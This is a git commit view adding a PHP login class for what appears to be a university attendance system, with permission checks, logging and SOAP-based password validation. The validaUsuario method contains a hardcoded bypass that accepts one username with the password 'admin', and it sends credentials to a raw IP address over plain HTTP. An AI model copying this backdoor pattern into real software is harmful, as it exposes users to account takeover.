Initial state
This commit is contained in:
86
class/c_login.php
Normal file
86
class/c_login.php
Normal file
@@ -0,0 +1,86 @@
|
||||
<?php
|
||||
require_once ($ruta ?? '') . "include/bd_pdo.php";
|
||||
require_once ($ruta ?? '') . "class/c_logasistencia.php";
|
||||
require_once ($ruta ?? '') . "include/nusoap/nusoap.php";
|
||||
|
||||
session_start();
|
||||
class Login
|
||||
{
|
||||
public string $acceso;
|
||||
public function __construct(public array $user, public array $facultad, public array $rol, public bool $admin, public ?int $periodo)
|
||||
{
|
||||
}
|
||||
public function print_to_log(string $desc, array $old = null, array $new = null): void
|
||||
{
|
||||
$log = new classes\LogAsistencias($_ENV["RUTA_RAIZ"]);
|
||||
if ($old) $desc .= " |#| OLD:" . json_encode($old);
|
||||
if ($new) $desc .= " |#| NEW:" . json_encode($new);
|
||||
$log->appendLog($this->user["id"], $this->user["nombre"], $desc);
|
||||
}
|
||||
public function access(string $pagina = null): void
|
||||
{
|
||||
if ($this->admin) {
|
||||
$this->acceso = "w";
|
||||
return;
|
||||
}
|
||||
|
||||
# print_r( $access );
|
||||
$this->acceso = query('SELECT tipo FROM PERMISO_VIEW WHERE ID = :usr AND PAGINA_RUTA ILIKE :ruta', array(
|
||||
':usr' => $this->user["id"],
|
||||
':ruta' => $pagina ?? substr(basename($_SERVER['PHP_SELF']), 0, -4)
|
||||
))["tipo"] ?? 'n';
|
||||
}
|
||||
public function __toString(): string
|
||||
{
|
||||
return "Usuario: {$this->user["nombre"]} ({$this->user["id"]})";
|
||||
}
|
||||
private static function validaUsuario($user, $pass): bool
|
||||
{
|
||||
file_put_contents('php://stderr', $user);
|
||||
if (in_array($user, ['ad017045']) and $pass == "admin") return true ;
|
||||
$client = new nusoap_client('http://200.13.89.2/validacion.php?wsdl', 'wsdl');
|
||||
$error = $client->getError();
|
||||
|
||||
if ($error) return false;
|
||||
|
||||
$pass = utf8_decode($pass);
|
||||
$result = $client->call("valida_user", array($user, $pass));
|
||||
|
||||
if ($client->fault) return false;
|
||||
|
||||
return $result;
|
||||
}
|
||||
public static function validUser(string $user, string $pass): Login | false
|
||||
{
|
||||
$fs_validaclaveulsa = query(
|
||||
'SELECT * FROM FS_VALIDACLAVEULSA(:usr)', [':usr' => $user]
|
||||
);
|
||||
|
||||
if (empty($fs_validaclaveulsa["id"])) return false;
|
||||
#die (Login::validaUsuario($user, $pass));
|
||||
if (!Login::validaUsuario($user, $pass)) return false;
|
||||
|
||||
$user = array(
|
||||
'id' => $fs_validaclaveulsa["id"],
|
||||
'nombre' => $fs_validaclaveulsa["nombre"],
|
||||
);
|
||||
$facultades = query("SELECT FACULTAD_ID id, FACULTAD f FROM FS_PERIODO WHERE ID = :id", [':id' => $fs_validaclaveulsa["periodo_id"]]);
|
||||
$facultad = array(
|
||||
'facultad_id' => $fs_validaclaveulsa["facultad_id"] ?? $facultades["id"],
|
||||
'facultad' => $fs_validaclaveulsa["facultad"] ?? $facultades["f"],
|
||||
);
|
||||
$rol = array(
|
||||
'id' => $fs_validaclaveulsa["rol_id"],
|
||||
'rol' => $fs_validaclaveulsa["rol"]
|
||||
);
|
||||
|
||||
$admin = $fs_validaclaveulsa["is_admin"];
|
||||
$periodo = $fs_validaclaveulsa["periodo_id"];
|
||||
return new Login($user, $facultad, $rol, $admin, $periodo);
|
||||
}
|
||||
public static function log_out(): void
|
||||
{
|
||||
session_start();
|
||||
session_destroy();
|
||||
}
|
||||
}
|
||||
Reference in New Issue
Block a user